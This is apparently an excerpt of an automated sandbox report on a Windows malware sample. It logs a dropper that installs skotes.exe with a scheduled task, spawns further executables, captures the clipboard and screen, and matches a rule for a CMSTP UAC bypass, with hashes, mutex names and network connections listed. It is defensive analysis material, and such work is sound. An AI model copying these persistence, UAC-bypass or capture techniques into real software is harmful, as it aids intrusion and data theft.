Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51692 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51694 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:51698 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.9:51761 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 140.82.121.3:443 -> 192.168.2.9:51764 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51767 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.9:51769 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe

Code function: 13_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

13_2_00439020

Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe

Code function: 13_2_00439020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

13_2_00439020

Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe

Code function: 13_2_004391E0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

13_2_004391E0

System Summary

Malicious sample detected (through community Yara rule)

Source: 10.2.Fe36XBk.exe.400000.0.unpack, type: UNPACKEDPE

Matched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen

PE file contains section with special chars

Source: Mc3FDUMnVz.exe	Static PE information: section name:
Source: Mc3FDUMnVz.exe	Static PE information: section name: .idata
Source: Mc3FDUMnVz.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.7.dr	Static PE information: section name:
Source: Fe36XBk[1].exe.7.dr	Static PE information: section name: .idata
Source: Fe36XBk[1].exe.7.dr	Static PE information: section name:
Source: Fe36XBk.exe.7.dr	Static PE information: section name:
Source: Fe36XBk.exe.7.dr	Static PE information: section name: .idata
Source: Fe36XBk.exe.7.dr	Static PE information: section name:

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Process Stats: CPU usage > 49%

Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe

File created: C:\Windows\Tasks\skotes.job

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0018EA0C	3_1_0018EA0C
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001F1670	3_1_001F1670
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_0025204A	3_1_0025204A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001E6C6F	3_1_001E6C6F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_002700F7	3_1_002700F7
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001B7F3B	3_1_001B7F3B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 3_1_001FCB8F	3_1_001FCB8F
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 12_2_01891EF0	12_2_01891EF0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 12_2_01891BEF	12_2_01891BEF
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 12_2_01891C00	12_2_01891C00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 12_2_01891EE0	12_2_01891EE0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042C0C0	13_2_0042C0C0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004380CD	13_2_004380CD
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004258B0	13_2_004258B0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043E150	13_2_0043E150
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00412159	13_2_00412159
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004321AB	13_2_004321AB
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040BA60	13_2_0040BA60
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00419A00	13_2_00419A00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00446220	13_2_00446220
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00441310	13_2_00441310
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004293EE	13_2_004293EE
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043DE00	13_2_0043DE00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004456F0	13_2_004456F0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004436B9	13_2_004436B9
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00401040	13_2_00401040
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00410845	13_2_00410845
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00422845	13_2_00422845
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00410050	13_2_00410050
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040E830	13_2_0040E830
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00412830	13_2_00412830
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042D831	13_2_0042D831
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043B8D2	13_2_0043B8D2
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004378E7	13_2_004378E7
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004278B4	13_2_004278B4
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041A8BA	13_2_0041A8BA
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043C0BF	13_2_0043C0BF
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00426150	13_2_00426150
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00436960	13_2_00436960
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00429970	13_2_00429970
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042B175	13_2_0042B175
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041F100	13_2_0041F100
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040C920	13_2_0040C920
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00433930	13_2_00433930
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040B980	13_2_0040B980
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00408A40	13_2_00408A40
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040A240	13_2_0040A240
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042026A	13_2_0042026A
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004452C0	13_2_004452C0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00402AD0	13_2_00402AD0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004152F4	13_2_004152F4
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00435A86	13_2_00435A86
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00415A8F	13_2_00415A8F
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00432A8D	13_2_00432A8D
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00421A90	13_2_00421A90
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00423AB0	13_2_00423AB0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00420AB0	13_2_00420AB0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043DAB0	13_2_0043DAB0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043EB40	13_2_0043EB40
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00421350	13_2_00421350
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00438B00	13_2_00438B00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00445B00	13_2_00445B00
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00432B2C	13_2_00432B2C
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040E380	13_2_0040E380
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00412B90	13_2_00412B90
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00441BA0	13_2_00441BA0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444C40	13_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00409460	13_2_00409460
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00418C20	13_2_00418C20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040C4C0	13_2_0040C4C0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042C4D0	13_2_0042C4D0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004424D0	13_2_004424D0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004324E1	13_2_004324E1
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004034F0	13_2_004034F0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042C4F0	13_2_0042C4F0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041BCF6	13_2_0041BCF6
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042B4B0	13_2_0042B4B0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0040B540	13_2_0040B540
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042ED44	13_2_0042ED44
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444D50	13_2_00444D50
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444D69	13_2_00444D69
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043D570	13_2_0043D570
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041B500	13_2_0041B500
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00407D20	13_2_00407D20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00442D3C	13_2_00442D3C
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042E53D	13_2_0042E53D
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004385C7	13_2_004385C7
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_004205BB	13_2_004205BB
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043F64E	13_2_0043F64E
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00426650	13_2_00426650
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444C40	13_2_00444C40
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041FE58	13_2_0041FE58
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00415E70	13_2_00415E70
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00445E70	13_2_00445E70
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444E70	13_2_00444E70
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444625	13_2_00444625
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043CE21	13_2_0043CE21
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043EE20	13_2_0043EE20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041DEF0	13_2_0041DEF0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00421680	13_2_00421680
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00403E90	13_2_00403E90
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00421EA0	13_2_00421EA0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00434EAB	13_2_00434EAB
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00408EB0	13_2_00408EB0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0042DF66	13_2_0042DF66
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041A766	13_2_0041A766
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00404772	13_2_00404772
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444F20	13_2_00444F20
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0043D7D0	13_2_0043D7D0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041AFF7	13_2_0041AFF7
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_0041BF8A	13_2_0041BF8A
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00424F90	13_2_00424F90
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00444FB0	13_2_00444FB0
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: 13_2_00429FBD	13_2_00429FBD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 29_2_00007FF887BB5010	29_2_00007FF887BB5010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 31_2_00007FF887BE4DFB	31_2_00007FF887BE4DFB

Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\4UK5I61J\Ryu8yUx[1].exe 991515CEFB9B7C2112EAC6558F98E2EC5892F01AA93E49218F6D9C1C7FC28022
Source: Joe Sandbox View	Dropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\QI6Y9C7H\kUHbhqh[1].exe AA63CF25CFC47E6A53DC1B286E425FAA8775AC0311C47CA6C59D1950CFA03251

Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: String function: 00418C10 appears 87 times
Source: C:\Users\user\AppData\Local\Temp\1074059001\Ryu8yUx.exe	Code function: String function: 0040B230 appears 43 times

Source: Stamp_Setup.exe.11.dr	Static PE information: Resource name: RT_VERSION type: COM executable for DOS
Source: Stamp_Setup.tmp.23.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Stamp_Setup.tmp.23.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: Stamp_Setup.tmp.25.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: Stamp_Setup.tmp.25.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Source: is-6JNF1.tmp.26.dr	Static PE information: Resource name: RT_RCDATA type: PE32+ executable (console) x86-64, for MS Windows
Source: is-6JNF1.tmp.26.dr	Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows

Source: kUHbhqh.exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: kUHbhqh[1].exe.7.dr	Static PE information: Number of sections : 11 > 10
Source: is-DKJ0H.tmp.26.dr	Static PE information: Number of sections : 12 > 10

Source: Mc3FDUMnVz.exe	Static PE information: Section: shlcppqz ZLIB complexity 0.9942111841605951
Source: skotes.exe.0.dr	Static PE information: Section: shlcppqz ZLIB complexity 0.9942111841605951
Source: Ryu8yUx[1].exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: Ryu8yUx.exe.7.dr	Static PE information: Section: .rdata ZLIB complexity 1.0003345630787037
Source: Fe36XBk[1].exe.7.dr	Static PE information: Section: ZLIB complexity 0.9960719138198758
Source: Fe36XBk[1].exe.7.dr	Static PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399
Source: Fe36XBk.exe.7.dr	Static PE information: Section: ZLIB complexity 0.9960719138198758
Source: Fe36XBk.exe.7.dr	Static PE information: Section: apuhhdvg ZLIB complexity 0.994313635778399

Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Ryu8yUx[1].exe.7.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: Ryu8yUx.exe.7.dr, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'
Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, gBMthepoZSL1ZVKpeA.cs	Cryptographic APIs: 'CreateDecryptor'

Source: Ryu8yUx[1].exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: Ryu8yUx.exe.7.dr, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='
Source: 12.2.Ryu8yUx.exe.45b9550.0.raw.unpack, Program.cs	Base64 encoded string: 'YTVlY2ZkN2RjODQzZTM5ZTA4ZmE4MWExMzQ2NTFkNjVhNjI2MDEwNDc0ZTJmNzQ3YzUxMDg3MWJjMTc1N2QyMg=='

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Mutant created: NULL
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Mutant created: \Sessions\1\BaseNamedObjects\94a5dd291cdb
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1132:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3648:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\1b62a0821db7b004b282c4b72343cd7a
Source: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe	Mutant created: \Sessions\1\BaseNamedObjects\MVHEBzjxKloGkPj
Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	Mutant created: \Sessions\1\BaseNamedObjects\StrangeRod
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5876:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7512
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5884:120:WilError_03
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\IntriguedLeopard
Source: C:\Windows\System32\regsvr32.exe	Mutant created: \Sessions\1\BaseNamedObjects\2f4cb03984c191cc482337

Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-MF1Q9.tmp\Stamp_Setup.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Roaming\Stamp_Setup.exe	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-GEAO5.tmp\Stamp_Setup.tmp	Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Source: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\regsvr32.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: Mc3FDUMnVz.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: Fe36XBk.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: unknown	Process created: C:\Users\user\Desktop\Mc3FDUMnVz.exe "C:\Users\user\Desktop\Mc3FDUMnVz.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\Mc3FDUMnVz.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe "C:\Users\user\AppData\Local\Temp\1074057001\Fe36XBk.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe "C:\Users\user\AppData\Local\Temp\1074058001\kUHbhqh.exe"
